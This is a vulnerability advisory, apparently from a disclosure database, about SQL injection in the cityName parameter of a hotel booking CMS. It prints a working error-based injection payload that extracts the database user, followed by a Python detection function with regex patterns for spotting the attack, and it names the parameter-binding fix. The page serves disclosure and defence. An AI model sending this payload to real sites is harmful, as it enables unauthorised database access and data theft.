Description
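### 0x01 Vulnerability Summary

Submitted: 2015-09-04 13:33

Disclosed: 2015-12-06 09:00

Vulnerability type: SQL injection

The cityName parameter of the /?m=hotel.setSearchSession file in BookingeCMS HotelCMS, developed by 珠海中新信息科技有限公司, is vulnerable to SQL injection.

### 0x02 Exploitation

Test payload (submitted via POST):
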
/?m=hotel.setSearchSession
```
cityName=&type=getCityId&cityName=%E7%A6%8F%E5%B7%9E%' AND (SELECT 4965 FROM(SELECT COUNT(*),CONCAT(0x7c,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&indate=2015-08-27&outdate=2015-08-30&address=&hotelName=1
```
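
For defenders reviewing request logs or writing a WAF-style rule, the following added example (not part of the original advisory or the vendor's code) inspects POST bodies sent to this endpoint and reports the traits visible in the test payload above. The function name `inspect_search_post`, the pattern labels, and the benign sample body are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl

# Heuristics modelled on the shape of the test payload shown above:
# a quote character in cityName followed by an error-based subquery.
SUSPICIOUS = [
    ("quote", re.compile(r"['\"]")),
    ("subquery", re.compile(r"\(\s*select\b", re.I)),
    ("info_schema", re.compile(r"information_schema", re.I)),
    ("rand_group_error", re.compile(r"floor\s*\(\s*rand\s*\(", re.I)),
]

def inspect_search_post(query, body):
    """Return a list of findings for a POST whose URL query string is `query`."""
    if dict(parse_qsl(query)).get("m", "") != "hotel.setSearchSession":
        return []  # not the endpoint described in this advisory
    # keep_blank_values=True so an empty first cityName still counts as a duplicate
    pairs = parse_qsl(body, keep_blank_values=True, errors="replace")
    values = [v for k, v in pairs if k == "cityName"]
    findings = []
    if len(values) > 1:
        findings.append("duplicate_cityName")
    for value in values:
        for name, pattern in SUSPICIOUS:
            if pattern.search(value) and name not in findings:
                findings.append(name)
    return findings

# BENIGN_BODY is constructed for this example; PAYLOAD_BODY is the test body from this page.
BENIGN_BODY = ("cityName=%E7%A6%8F%E5%B7%9E&type=getCityId&indate=2015-08-27"
               "&outdate=2015-08-30&address=&hotelName=1")
PAYLOAD_BODY = ("cityName=&type=getCityId&cityName=%E7%A6%8F%E5%B7%9E%' AND (SELECT 4965 "
                "FROM(SELECT COUNT(*),CONCAT(0x7c,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),"
                "0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS "
                "GROUP BY x)a) AND '%'='&indate=2015-08-27&outdate=2015-08-30&address=&hotelName=1")

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("payload", PAYLOAD_BODY)):
        print(label, inspect_search_post("m=hotel.setSearchSession", body))
```

A quote on its own is a weak signal, since legitimate place names can contain one, so weight the combined findings. Detection does not replace the fix, which is binding cityName as a query parameter instead of concatenating it into the SQL string.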

### 0x03 Reference Links
http://www.wooyun.org/bugs/wooyun-2010-0137378

Title: BookingeCMS HotelCMS hotel booking management system: injection in the cityName parameter
ID: SSV:90010
Source: https://www.seebug.org/vuldb/ssvid-90010
Reporter: Root
Published: 2015-12-07
Status: poc,details